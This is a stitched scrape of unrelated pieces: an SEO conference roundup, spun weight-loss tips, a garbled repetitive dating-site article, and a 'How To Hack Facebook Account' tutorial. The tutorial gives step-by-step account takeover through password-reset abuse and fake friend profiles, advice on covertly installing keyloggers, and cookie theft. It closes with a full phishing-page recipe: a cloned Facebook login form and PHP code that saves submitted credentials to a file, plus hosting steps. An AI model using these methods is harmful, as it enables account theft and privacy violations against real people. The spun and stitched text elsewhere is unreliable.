Dr Pete provides a short script in his deck to group keywords to help strip out noise in your data set
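Dr Pete's deck contains his own grouping script; purely as an illustration of the idea, here is a naive sketch that folds close variants (case, punctuation, trailing plurals) into one bucket — the normalisation rules are assumptions for the sketch, not his exact method:

```python
import re
from collections import defaultdict

def normalise(keyword):
    # Lowercase, strip punctuation, and crudely singularise each word so
    # "John Lewis sofas" and "john lewis sofa" land in the same bucket.
    words = re.sub(r"[^a-z0-9 ]", "", keyword.lower()).split()
    return " ".join(w[:-1] if w.endswith("s") and len(w) > 3 else w for w in words)

def group_keywords(keywords):
    """Map each normalised form to the raw variants that collapse into it."""
    groups = defaultdict(list)
    for kw in keywords:
        groups[normalise(kw)].append(kw)
    return dict(groups)
```

Summing volume per group rather than per raw keyword is what strips the plural/misspelling noise out of the data set.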
If sitelinks appear for your website, Google thinks you’re a brand
A new SERP feature (‘best of’ carousel) is appearing in the US, and will likely be rolled out into Europe soon
This feature takes you to a heavily paid SERP, with lots of ads (some well-disguised!)
If a keyword has a heavily paid SERP, you should probably not bother trying to rank for it, as the pay-off will be small
‘People also ask’ is on 90% of searches - be sure to try and take advantage of this SERP space
To summarise, perception is everything with keyword research - make sure you filter out the noise!
SearchLove London 2019 - Dr. Pete Meyers - Scaling Keyword Research: More Isn't Better from Distilled
Lindsay Wassell - ‘Managing Multinational & Multilingual SEO in Motion’
Lindsay covered the many challenges involved in handling migrations involving multiple international site variants. Her key points are highlighted below:
Ask your dev team to make sure it’s possible to implement hreflang via XML sitemaps or on-page; then if there are problems implementing one method, you have another as a fall-back option
When deciding site structure and where international sites should be located (sub-folder? Subdomain? ccTLD?) bear in mind that there are no one-size-fits all solutions. It may be best to have a mixture of solutions, depending on each market.
If you have hreflang relationship issues, Lindsay advises to use Google Sheets to manage hreflang mappings, in combination with a script that can automatically generate XML sitemaps (link provided in her deck)
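Lindsay links her own script in the deck; as an illustration of the general idea, here is a standard-library sketch that turns language→URL clusters (the shape you might export from such a Google Sheet — the input format is an assumption) into hreflang entries for an XML sitemap:

```python
from xml.etree import ElementTree as ET

SM_NS = "http://www.sitemaps.org/schemas/sitemap/0.9"
XHTML_NS = "http://www.w3.org/1999/xhtml"

def build_hreflang_sitemap(clusters):
    """clusters: list of dicts like {"en-gb": url, "de-de": url}.

    Each dict is one hreflang cluster; every URL in a cluster must list
    every variant (including itself) for the relationships to validate."""
    ET.register_namespace("", SM_NS)
    ET.register_namespace("xhtml", XHTML_NS)
    urlset = ET.Element(f"{{{SM_NS}}}urlset")
    for cluster in clusters:
        for url in cluster.values():
            node = ET.SubElement(urlset, f"{{{SM_NS}}}url")
            ET.SubElement(node, f"{{{SM_NS}}}loc").text = url
            for lang, alt in cluster.items():
                link = ET.SubElement(node, f"{{{XHTML_NS}}}link")
                link.set("rel", "alternate")
                link.set("hreflang", lang)
                link.set("href", alt)
    return ET.tostring(urlset, encoding="unicode")
```

Generating the file from the sheet on every change keeps the mappings reciprocal, which is where most hreflang relationship errors come from.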
In order to encourage more people in your organisation to understand the importance of SEO and to make it a priority, highlight statistics such as traffic levels and revenue coming from organic search
Also keep in mind that every department has a wish list when it comes to a migration! Be tactical and tack onto other people’s wishlists to get SEO items implemented
As a final tip - check redirects before going live, as often dev teams will say it’s under control, and then there can be problems at the last minute
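One cheap pre-launch check needs no network at all: audit the redirect mapping itself for chains and loops, which waste crawl budget and dilute signals. A minimal sketch, assuming the map is a simple old-path→new-path dict:

```python
def audit_redirect_map(redirects):
    """redirects: dict of {old_path: new_path}. Returns (chains, loops).

    A chain is a redirect whose target is itself redirected; a loop is a
    sequence that revisits a path. Both should be flattened before launch."""
    chains, loops = [], []
    for start in redirects:
        seen, current = {start}, redirects[start]
        hops = [start]
        while current in redirects:
            hops.append(current)
            if current in seen:
                loops.append(hops)
                break
            seen.add(current)
            current = redirects[current]
        else:
            if len(hops) > 1:
                chains.append(hops + [current])
    return chains, loops
```

Running this over the migration sheet before go-live catches exactly the last-minute problems described above.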
SearchLove London 2019 - Lindsay Wassell - Managing Multinational & Multilingual SEO in Motion from Distilled
Stacey MacNaught - ‘Actioning Search Intent - What To Do With All That Data’
By analysing search intent, you can gain a ton of really insightful data. Stacey discussed how you can utilise all of this data to optimise your site for organic search and ultimately increase revenue and traffic.
Traditionally, search intent is categorised broadly as navigational, informational, and transactional. However, it’s often unclear where things are categorised because sometimes keywords are really ambiguous. Often you can break these categories down into more specific categories.
In terms of targeting keywords on your site, look out for opportunities where you may not be delivering the right content based on what query you’re targeting.
For example, if you’re targeting an informational keyword with a transactional result, you’re not going to rank. This can be an opportunity for you to create the kind of page that will rank for a select query. If the phrase is “best ballet shoes” and the results are informational pages, then you shouldn’t be serving a transactional result.
If you can be objective about the topic at hand and you have someone qualified to write that content, then you should definitely do it.
If your rankings drop but revenue is unaffected, it’s likely you’ve lost rankings on informational keywords
Don’t assume that users will come back of their own accord - work with PPC and get them to retarget to users who have read your content
Build out different audience lists according to the types of content or topics that users have been reading
Build out separate PPC campaigns for this so you can easily monitor results
Stacey saw CPA fall by 34% when she did this for a healthcare site
To generate content ideas, talk to the sales and customer service teams to find out what users are asking, then build content around it
You can also use Google Forms to survey previous customers to find out what drove their purchase
SearchLove London 2019 - Stacey MacNaught - Actioning Search Intent: What to Do with All That Data from Distilled
Will Critchlow - ‘Misunderstood Concepts at the Heart of SEO - Get An Edge By Understanding These Areas’
Most things in SEO can be boiled down to technical accessibility, relevance, quality, and authority. Or: can it be crawled, does it meet a keyword need, and is it trustworthy? However, some of the foundational elements of SEO are misunderstood.
Regarding crawlability, it’s important to understand how setting directives in robots.txt will impact your site if handled incorrectly.
Robots.txt directives do not cascade. For example, if you set a specific directive to disallow Googlebot from /example, that is the one it will follow. Even if you specify that * (all user agents) are disallowed from /dont-crawl elsewhere in the file, Googlebot will only follow its own group's directive not to crawl /example and will still be able to crawl /dont-crawl.
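You can demonstrate this non-cascading behaviour with Python's standard-library robots.txt parser, which applies the same group-matching rule (a bot obeys its most specific matching group, and only falls back to `*` when no named group matches):

```python
from urllib import robotparser

rules = """\
User-agent: Googlebot
Disallow: /example

User-agent: *
Disallow: /dont-crawl
""".splitlines()

rp = robotparser.RobotFileParser()
rp.parse(rules)

# Googlebot matches its own named group, so the * group never applies to it:
assert not rp.can_fetch("Googlebot", "/example")        # blocked by its group
assert rp.can_fetch("Googlebot", "/dont-crawl")         # NOT blocked
assert not rp.can_fetch("SomeOtherBot", "/dont-crawl")  # * group applies
```

Note this only shows one parser's behaviour — as the next point says, different tools disagree at the edges, so test with the parser that matters for your case.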
The Google documentation, the robots.txt checker in GSC, and the open-source parser tend to disagree on what is allowed and disallowed. So, you’ll need to do some testing to ensure that the directives you’re setting are what you intended.
We often have a lot of intuition about how things like PageRank work, but too many of our recommendations are based on misconceptions about how authority flows
There are some huge changes coming to major browser cookie handling. The cookie window will be shorter, which means that a lot of traffic that’s currently classified as organic will be classified as direct. Understanding the language around the changes that are happening is, and will be, important
There are common misconceptions too about the meaning of ‘long tail keywords’
50% of Twitter respondents incorrectly think it means that there are many words in a query
40% understand the correct meaning, which is that they are keywords with low search volume
SearchLove London 2019 - Will Critchlow - Misunderstood Concepts at the Heart of SEO from Distilled
That's it for our London conference for another year. But the good news is we are heading to San Diego in March where we'll be getting some sun, sea and search at SearchLove San Diego!
If you have any questions about our conferences please leave a comment below or come and say hello over on Twitter.
SearchLove London 2019: The Great Big Round Up was originally posted by Video And Blog Marketing
peacekaleandyoga1 · 5 years
Most people like to avoid the truth about being unhealthy and prefer not to think that their weight may be a problem, because facing it involves giving serious thought to unpleasant health issues and eventualities. The tips in the article below will help you out.
It is acceptable not to finish your plate. Taking a doggy bag home with you after eating out is perfectly fine. Don’t eat every last bite of food purely because it’s on your plate.
Pack a lunch each day to help you lose weight. Bringing your own lunch from home allows you to choose the foods you eat as well as the quantities. Controlling portions is essential if you want to keep your weight loss on track.
TIP! A great way to lose some pounds is to only wear tight fitting clothing. Wearing loose fitting clothing may help overweight people forget about their weight problem.
Stay Active
Stay active during the day to lose weight quickly. An easy way to stay active all day is to avoid sitting down for long stretches.
You can shed extra weight simply by walking up and down the stairs instead of using an elevator. While it might seem inconsequential, ditching the elevator and taking the stairs can be an essential part of losing weight.
TIP! To lose weight, watch your calorie intake. If you eat more calories in a day than you burn, weight loss just is not going to happen.
Your weight loss goals must be realistic. Just like most other things, if the goal is not realistic, you are setting yourself up for failure. If you try to lose 15 pounds in a few weeks, you are not giving yourself enough time to reach this goal and you will most likely fail. Instead, give yourself more time and set a goal that you can attain for that specific week. Don’t start looking at the long run just yet; concentrate on your weight loss from week to week.
Never eat anything right before going to bed. If your bedtime is 10pm, avoid eating after 8pm. If you must have something, eat vegetables and wash them down with water. Although there may be times when you cannot stick to the two-hour rule, you should try to stick to it as often as you can. Your body will store the fat and calories that have not been metabolized when you go to sleep.
Talking about weight loss is easier than actually getting started on a plan. You may wonder why you waited so long to start.
TIP! When you are trying to shed weight, you should never feel ashamed that you have not finished your entire meal. Though many people are taught at an early age to clean their plate, it can cause internal struggles for those who battle to lose weight.
Plan your meals ahead as part of your diet. This keeps you from making rash meal decisions that might not be healthy. Make sure that you adhere to your planned meals. You can feel free to swap the meals you have planned for one day with another, but don’t replace a healthy meal with McDonald’s. You can even burn some calories by cooking in the kitchen.
If you work a full-time job, bring a healthy lunch and snacks with you. Otherwise you will be tempted to reach for unhealthy junk food when you get home.
Eating Healthy
TIP! You should spend most of your time with people who exercise and are otherwise active. Surrounding yourself with active people will encourage you to be active as well.
A dietitian can help you put together a healthy and nutritious diet plan. The dietitian will educate you to ensure you are eating healthy foods. Eating healthy is the number one factor in any weight loss plan.
Another key to losing weight is to eat at the same times every day. It has been scientifically proven that people who know when their next meal is coming are less likely to search for other food. Try to create a timeframe for when you can eat, and keep to it.
The number one tip of all for weight loss is to eat less and exercise more.
TIP! To help in your fight against the bulge, get an exercise buddy. This helps you to socialize so that you are having fun while burning calories.
If you work at a desk, you can still walk around the building during breaks to help you lose weight or prevent weight gain.
Eating a big breakfast, a medium lunch, and a small dinner can really boost weight loss. Eating your carbohydrates and meat earlier in the day can help.
Keep healthy snacks on hand. This gives you easy access to a snack that is much healthier than other convenience foods, and makes a great snack you can take with you.
TIP! To stay healthy, spread your eating habits out through the day. Having 5 or 6 small meals during the day is healthier than 3 large meals.
Weight Loss
A good way to stay motivated is to visit bodybuilding websites and blogs that talk about weight loss. If you aren’t feeling up to the task of losing weight, you can view one of these sites to increase your motivation. Once you begin reading the positive and uplifting stories online, you will feel more inspired and be able to stick to your plan, whatever your weight loss goals may be.
Studies have shown that people who log their eating habits are more likely to continue to lose weight. They have actually been shown to lose twice as much as those who don’t keep track of what they eat.
TIP! Avoid eating before you go to bed. If you normally go to sleep around 10, then you should cut off your food intake by 8.
One important component of weight loss success is increasing your metabolism. You can speed up your metabolic rate with certain foods, such as fish, walnuts and flax-seed oil.
Weight Loss
Real weight loss starts first in the mind and only afterwards in the body. Once you decide that weight loss is important to you, you must maintain strong willpower if you hope to make it past the more difficult patches of your journey.
TIP! Try to avoid skipping meals. Try to eat roughly three daily meals.
Once you get started on a weight loss journey, you will find that it is not as terrible as you expected. Maintaining your weight can be a fickle thing. If you follow the tips in the article above, you should start seeing some weight loss success.
If you enjoyed this post, you should read this: Herbalife Nutrition Launches Products to Help Busy Americans Stay Healthy | Business Wire
from https://ift.tt/2OuoLFm
risprinabeachw-blog · 5 years
Do dating sites work yahoo answers
Do Dating Websites Work

Or do you look absolutely stunning—showing a little skin, wearing fresh makeup, looking happy? Years ago, I was just out of a terrible relationship and in no mood to date again. What happens if I decide not to include a photo? Create a sense of mystery and excitement and give people a concrete reason to contact you. This may seem counterintuitive, but it can be harder to find what you're looking for in denser geographic areas. There was just one problem: I didn't want to throw myself back into the dating pool. How much should I explain about myself in my profile? The problem has to do with how dating sites collect and parse our data.
9 Answers for the Online Dating Questions Everyone Asks

I just wanted to find the right man, someone who was perfect for me. Chances are extremely good that few people will click through your profile. It's entirely possible though that you've done nothing wrong at all and that you have a very good profile. It causes people to click and buy. Maybe it's coming across as bitter rather than funny. Between the time I started online dating and now, I've discovered exactly how dating websites work.
9 Answers for the Online Dating Questions Everyone Asks

The site will use your behavioral data and match you on that. If you use Pinterest, which puts all its emphasis on photos, you already know the power of an image. Use the same approach when writing your profile. But again, there might be a good reason you're clicking on men who seem contrary to your stated preferences: You're curious, you're bored, you're looking with a girlfriend and that happens to be her type. There are many variables, so try to evaluate each one. If you're not having any luck, try expanding your geographic zone if you're willing to travel. I've tracked and analyzed data, spoken to computer scientists, and figured out what makes certain profiles successful.
Do Dating Websites Work

I wasn't interested in meeting dozens of single men. This can be an advantage, although in my experience other people often choose inappropriate people as a match for you, despite their good intentions. In most cases, it's random chance. You need to post two to four casual photos of just yourself. A lot of sites ask some very basic questions, like whether you smoke or what religion you are. Set your location, age, and gender preferences and you'll see a stream of pictures showing who's available nearby. It has to do more with neuroscience than superficiality.
Do Dating Websites Work

Best of all, there were hundreds of online dating sites waiting for me to sign on. If they do send you a message, a photo is likely to be the first thing they ask for. With this in mind, think about the photos you've uploaded. How long is this going to take? We offer a wide range of dating profiles for dating sites and social networking sites as well. Why isn't anyone contacting me? In part because of how dating sites are designed, most of us see photos first, and that's when we determine whether to read through the rest of a profile. Going in to refresh your profile once a day could potentially help, depending on the dating site you're using.
9 Answers for the Online Dating Questions Everyone Asks

I wasn't interested in meeting dozens of single men. My friends were all excited for my between-boyfriend time. Between the time I started online dating and now, I've discovered exactly how dating websites work. Enough to create a curiosity gap. I'd enjoy an exhilarating freedom—I could learn how to paint or wear yoga pants all weekend long if I wanted. Whether you're creating a new profile or you're a longtime, frustrated online dater, I have some insights that will help make your experience better. If you're looking for a long-term relationship, stick with the traditional online dating sites.
9 Answers for the Online Dating Questions Everyone Asks

There was just one problem: I didn't want to throw myself back into the dating pool. We may fib a little when describing whether we smoke, but what incentive is there to stretch the truth about what we want in a mate? If you're looking for a long-term relationship, you probably should buy at least a three-month membership. Are you using the best possible photos? Did you write an extremely long profile? Here are some basic answers to the questions you might be too embarrassed to ask. Think about how websites write their headlines, e.g. They allow members to create their own Web page, access to popular free music videos and more. I live in a massive city with millions of possibilities—why can't I find anyone good online? I live in a small town with slim pickings. There's a much better way of matching people—asking you to describe exactly what you're looking for in specific terms.
9 Answers for the Online Dating Questions Everyone Asks

It was exhausting and often demoralizing. I keep hearing about dating apps, like Tinder. That said, if you know exactly what you're looking for and you have a strategy, it may take only a few weeks. Online retailers showcase photos of their products for good reason. Some reward more active users with better placement, especially if they filter by last log in or update.
Do Dating Websites Work

If you smoke a cigarette every now and again, maybe only when you're having a cocktail, does that make you a smoker? Dating sites are built to interview you individually, and I'd hazard a guess that you're not painting a truly accurate picture of yourself online. It may seem like online dating is straightforward, but what's happening behind the scenes—and your screen—can be confusing and can often produce bizarre results. Some sites ignore your answers and instead look at your behaviors. Am I really being matched with someone specifically for me, or is it all random chance? I don't want anyone to know who I am in real life. Even if you do immediately find the man of your dreams, it'll take a few months of dating before you know whether you're officially out of the dating pool. But you need to be explicit and honest about where you live early on—and you need to be willing to put in the effort to drive out to see the people you're meeting. If you're willing to expand your reach to the maximum number of miles allowed, or if you're able to drive to the next town over, then yes.
9 Answers for the Online Dating Questions Everyone Asks

How are they different from online dating sites? A bigger population tends to mean more people online, and choosier daters. Will anyone actually read my profile, or are they just looking at my photos? Unlike online dating sites, most mobile apps are free, require just a few seconds to set up, and include a real-time geolocation feature, which is to say that they're more immediate. Once I had my own strategy in place, the next date I went on turned out to be my last one ever. I have been on the internet for some years now and do not remember there being an Internet without Italian dating services. Just about everyone uses them for casual meetups, but some women I know claim that they're finding significant others using apps like Tinder. An attractive guy would send me a message.
How To Hack Facebook Account
Hacking Facebook
Facebook is easily the most popular social networking site in the entire world. Each day, millions and millions of users log in to check their news feeds, connect with friends and family, and even make calls. There’s just one problem. People, even those who aren’t adept at hacking, can compromise others’ accounts by stealing their passwords. It may sound like something out of an action film, but the honest truth is that there are unbelievably simple methods that most people can use to gain access to someone else’s Facebook account.

If you want to become a competent hacker, knowing methods for hacking Facebook passwords is paramount to your learning. Now, I certainly don’t advocate using these methods to break into other people’s personal accounts and compromise their privacy. Not only is that illegal, it is morally wrong. If you’re reading this because you want to get back at an ex or cause disruption, then you probably shouldn’t be reading this book.

On a more practical note, knowing how people hack into Facebook accounts is critical if you want to avoid being hacked. There are several things users can do to protect themselves from the most common Facebook attacks, as we’ll discuss later.
1: The Password Reset
This type of attack lacks the razzle-­‐dazzle of the more complex types of attacks, but the fact remains that it is a simple yet effective way to commandeer another user’s Facebook profile. In fact, this method is commonly used to hijack all sorts of different online accounts. By changing the password, the attacker not only gains access to the profile, but they simultaneously bar the owner of the account from accessing their profile. More often than not, this attack is performed by a friend or acquaintance that has access to the target’s personal computer or mobile device. You’d be surprised how many people don’t even log out of Facebook, or who cache their username and password in their browser because they are lazy. The steps are as follows:
⦁ Step 1: The first step in this attack is to determine the email address used to log in to the target’s profile. If an attacker doesn’t already know the target’s email address, guess what? Most people list this information in the contact section of their Facebook profile.
⦁ Step 2: Now all an attacker needs to do is click on the Forgotten your password? button and enter in the assumed email address of the target. Next, an attacker would click on the This is my account
⦁ Step 3: Next, the password reset procedure will ask if the user wants to reset their password via email. However, many times people will delete old email accounts and use new ones. That’s why there’s a link that says No longer have access to these? Click the link to continue.
⦁ Step 4: The next step in the process is to update the email address linked to the account. The prompt will ask for new contact information via the How can we reach you? field. Make sure the email address you enter isn’t linked to another Facebook profile.
⦁ Step 5: This step is a little more challenging, because it will ask a security question.   If the attacker knows the target personally, this is going to be extremely easy. However, if the attacker doesn’t know the target very well, they can make an educated guess. Sometimes they even dig through the victim’s Facebook profile to glean information about possible correct answers to the security question. Once the correct answer has been discovered, the attacker needs to wait 24 hours before they can login.
⦁ Step 6: In the event that the attacker couldn’t guess the right answer to the security question, there is an option to Recover your account with help from friends. The only problem is that a lot of people ‘friend’ people on Facebook that they don’t know too well. Select between 3 and 5 friends that will be candidates for the rest of the attack process.
⦁ Step 7: This part of the password reset process sends passwords to the friends. There are two methods to this part of the process. Firstly, an attacker can contact these individuals from the fake email address to request the new password, and bonus points if the email address looks like the actual victim’s. In addition, the attacker can create 3 to 5 fake Facebook profiles and try to ‘friend’ the target on Facebook ahead of time. Then, all the attacker would need to do is select 3 to 5 of the bogus profiles during the procedure.

How to Prevent This Attack

It’s frightening how easy this attack is to carry out. The good news is that there are several things users can do to protect themselves from becoming the next victim of an attack as follows:
⦁ Use an email address that is only dedicated to Facebook use.
⦁ Don’t list your email address on your Facebook profile.
⦁ Make your security question as complex and difficult to guess as possible. If you really want to get tricky, you could enter a bogus answer that is unrelated to the question (as long as you can remember it!). For example, if the security question asks for your mother’s maiden name, you could enter “JohnjacobjingleheimershmidtLarsson” (though there is a character limit) or some other variant that is nearly impossible to guess. Omit personal information that is easy to guess, such as pet names, birthdates, anniversaries, etc.
2: Using the Infamous Keylogger Method
A keylogger is a nasty piece of software because it records every single keystroke a user types and logs that information invisibly. Usernames, passwords, and payment card data are all up for grabs if a hacker successfully installs a keylogger on a target’s computer. The first type we’ll look at for hacking Facebook is a software keylogger. The problem with software keyloggers is getting them installed on the target computing device. This can be extremely complex if a hacker wants to do it remotely, but if an attacker is a friend or personal acquaintance of the target, then this step becomes much easier. There are plenty of different keyloggers out there, and you can find many of them absolutely free of charge. After the software has been installed on the target computer, make sure you configure the settings to make it invisible and to set an email address that the software will send its reports to.
Hardware Keyloggers
There are also hardware keyloggers in existence that look like a flash drive or wireless USB stick. These really work best on desktop computers because they can be inserted into the back of the computer – and as they say, outta sight, outta mind. The code on the USB stick will effectively log keystrokes, though it isn’t effective for laptops. Some of them even look like old PS2 keyboard and mouse jacks. You can easily find one online.
How to Prevent This Attack
Keyloggers are nasty business, but there are several things users can do to protect themselves online as follows: ⦁ Use firewalls. Keyloggers have to send their report of logged keystrokes to another location, and some of the more advanced software firewalls will be able to detect suspicious activity.
⦁ Also, users should use a password database. These handy password vaults usually have tools that automatically generate random, secure passwords. You see, the keylogger won’t be able to see these passwords since you didn’t technically type them. Just make sure you always copy/paste the passwords when you log into an account.
⦁ Stay on top of software updates. Once an exploit has been found in an operating system, the OS manufacturer will typically include patches and bug fixes in following updates to ensure that the attack can’t be performed again.
⦁ Change passwords on a regular basis. Some users who are extremely security conscious will change their passwords every two weeks or so. If this sounds too tedious, you could even do it every month or every three months. It may seem unreasonably zealous, but it will render stolen passwords useless.
3: Phishing
You’d be surprised how gullible the average Internet user is these days. Most people don’t even check the URL of the site they are visiting as long as the web page looks as they expected it to look. A lot of people have created links to bogus URLs that look and behave exactly like the Facebook login page. Often these fake links are embedded into social media buttons on a website. For example, there might be a “Share on Facebook” link, but in order to share the content the user first needs to log in to their account. The phishing page simply stores the user’s credentials instead of sending them to Facebook. Some of the more advanced ones store a copy of the user’s input, and then supply that information to the actual Facebook login page. To the user, it looks as though they have genuinely logged into Facebook, when in fact, they first visited a phishing site. Believe it or not, it isn’t that difficult to clone a website. All an attacker needs is a fake page and a passable URL that is extremely close to the real URL. Furthermore, attackers can mass-email these links to email lists that are purchased online – and they’re dirt cheap, too. Though it is 2016 and phishing filters are becoming increasingly sophisticated, they’re not perfect.
How to Prevent This Attack
There are a few simple things users can do to avoid becoming the next victim of a phishing attack:
⦁ Never follow links from emails, especially those that come from sources you don’t already know. If you think you can trust the sender, always check the URL of the link before visiting the page. However, it’s better to visit the website directly.
⦁ Always check links on forums, websites, chatrooms, etc. Believe it or not, even popup ads can contain bogus links to phishing sites. If it doesn’t look legit, don’t click on it!
⦁ Always use anti-virus and security software. Many packages include phishing filters that will stop users from visiting known phishing sites.
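The advice about checking URLs can be made concrete. Below is a minimal sketch, in Python, of the kind of hostname comparison a phishing filter or a careful user performs; the lookalike domains are made up for illustration:

```python
from urllib.parse import urlparse

def is_expected_domain(url: str, expected: str = "facebook.com") -> bool:
    """Return True only if the URL's hostname is the expected domain
    or a subdomain of it; anything else is suspect."""
    host = (urlparse(url).hostname or "").lower()
    return host == expected or host.endswith("." + expected)

print(is_expected_domain("https://www.facebook.com/login.php"))   # True
print(is_expected_domain("http://faceb00k-login.example.com/"))   # False
print(is_expected_domain("https://facebook.com.evil.example/"))   # False
```

Note the third case: a hostname that merely *starts* with "facebook.com" still fails, because the real domain is whatever comes at the end of the hostname, which is exactly the detail phishers count on victims not reading.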
4: Stealing Cookies
Cookies are a necessary evil for most sites, and too often login sessions are kept alive in browser cookies without users knowing any better. An attacker doesn’t always need access to a target’s computer to steal a cookie, either. There are many sniffing techniques that can be performed across a LAN, such as the wireless network in a coffee shop. Once the cookie has been stolen, the hacker can load it into their own browser, fooling Facebook into believing that the attacker is the already-logged-in victim.
For example, an attacker could utilize Firesheep, an add-on for Firefox that sniffs traffic on Wi-Fi networks to steal cookies and store them within the attacker’s web browser. Once the attacker has stolen the cookie, they can log in to the target’s Facebook account, provided that the target is still logged in. Then, the attacker can change the password of the profile. However, if the victim logs out of Facebook, the cookie becomes worthless.
Final Thoughts on Facebook Security and Attack Prevention
There are also some general techniques and best practices for avoiding becoming the next victim of a Facebook attack. Some of them should be common sense, but too many users fail to give security a second thought.
⦁ Only use trusted wireless networks. If you need an Internet connection and happen to spot an unknown SSID, it’s in your best interest to leave it alone.
⦁ Within your Facebook profile, click on Account Settings and look in the Security section. Enable Secure Browsing, and make sure you always use HTTPS to prevent cookie theft.
⦁ Always log out after you are finished browsing Facebook to prevent a cookie attack. Too many users simply click the “X” in their tab or browser, which doesn’t log them out.
⦁ Connect using a VPN connection. This will encrypt all of your data before sending it to the VPN server, so local network attackers won’t be able to see what data you’re transmitting.
⦁ Less is more. Though users are frequently tempted to share their personal information with the world, you would do well to limit how much information you post online. Make sure private information such as email addresses, current location, and other similar information isn’t shared on Facebook.
⦁ Only befriend people that you trust. There are too many scams circulating that try to build trust with a target. The only problem is you have no idea who these strangers are, and more often than not, they’re trying to take advantage of you.
How to Create a Facebook Phishing Page
The most effective hacking attack always has been, and always will be, social engineering: it will always be easier to trick an unsuspecting victim than to defeat technological controls. In this tutorial, we’re going to take a close look at how to set up a phishing page to harvest usernames and passwords that can be used to hack other users’ Facebook accounts. However, and I can’t stress this enough, this knowledge should never be used to attack others in the real world. It simply isn’t legal, and it isn’t moral, either. If you’ve ever had your username or password stolen, you know how bad it feels when others have violated your privacy.
If you’re reading this with the hopes of learning how to gain access to countless users’ Facebook credentials, I should instead refer you to philosophical ideas on morality. Keeping that in mind, there is a lot of value, especially for aspiring hackers, to understanding how phishing works. Not only will it help you avoid mistakes that threaten your security and privacy, but it will also help you spot fishy phishing sites.
What is Phishing?
Phishing is the process of setting up a fake website or webpage that imitates another website. Attackers frequently employ this method to steal usernames and passwords. Most frequently, the process works as follows. A user clicks on a bad link to a phishing site. Believing they are viewing the intended web page, they enter their login credentials to access the web service. There’s just one problem. The user, who is really the attack’s victim, has actually entered their private information into a hacker’s website, and now the hacker has their login credentials! On Facebook, this may not be as consequential as on another website, like online banking. However, the hacker can now wreak ungodly amounts of havoc on a person’s social life. If it happens to be a business’s Facebook profile, they can damage that business. Today, however, we are going to set up an imitation Facebook login page to show you just how easy it is to start phishing. Let’s take a closer look at the steps required.
⦁ Pull up Facebook.com in your browser. Then, right click on the website’s login page. You should see an option along the lines of “view page source.” Click on this option and you should be able to view the code behind the page.
⦁ Go ahead and dump all of the page’s source code into Notepad (or your operating system’s best simple text editor).
⦁ If using Notepad, hit ctrl + f (which is the find hotkey) and search for action.
⦁ You should see a line that looks like this: action="https://www.facebook.com/login.php?login_attempt=1"
⦁ Delete everything contained in the quotations, and instead fill the quotes with post.php. Now it should read action="post.php"
⦁ Save this file somewhere on your computer with the file name of index.htm. Omit the final period from the filename. This is going to become your phishing page.
⦁ Next, create a new notepad document with the name of post.php. Omit the final period from the filename. Copy and paste the following code into this document, and remember to save it:
<?php
// Immediately redirect the visitor to the real Facebook page.
header('Location: http://www.facebook.com/');
// Append every submitted form field to usernames.txt as name=value lines.
$handle = fopen("usernames.txt", "a");
foreach ($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
⦁ At this point, you should now have two files saved: index.htm and post.php.
⦁ Next, this code actually needs to be uploaded to a web hosting service. There are free hosting providers, but I wouldn’t recommend actually posting this code publicly. Instead, it would be better to try this at home on your own web server. However, for the rest of the tutorial, we’ll be using 000Webhost.
⦁ After you have signed up for an account, browse to the control panel, and then to file manager.
⦁ Once the window opens, go to public_html.
⦁ Delete default.php, and then upload index.htm and post.php.
⦁ Next, click on a preview of index.htm. As you’ll notice, it should look nearly identical to the Facebook login page.
⦁ The URL of this page is what needs to be linked to in an attack. Sometimes attackers imbed this false link on other websites, forums, popup ads, and even emails.
⦁ Now go back to the file manager and public_html. There should be a file labeled usernames.txt.
⦁ Open this file and you should be able to see the login credentials that have been entered by a test user.
Final Thoughts
It really is a simple matter of copying the code from the Facebook login screen, adding some php code, and then setting up a dummy website. Again, don’t try this in the real world, because the consequences could be terrible. However, in a home environment on your own web server, this tutorial provides great insight into how attackers phish for usernames and passwords.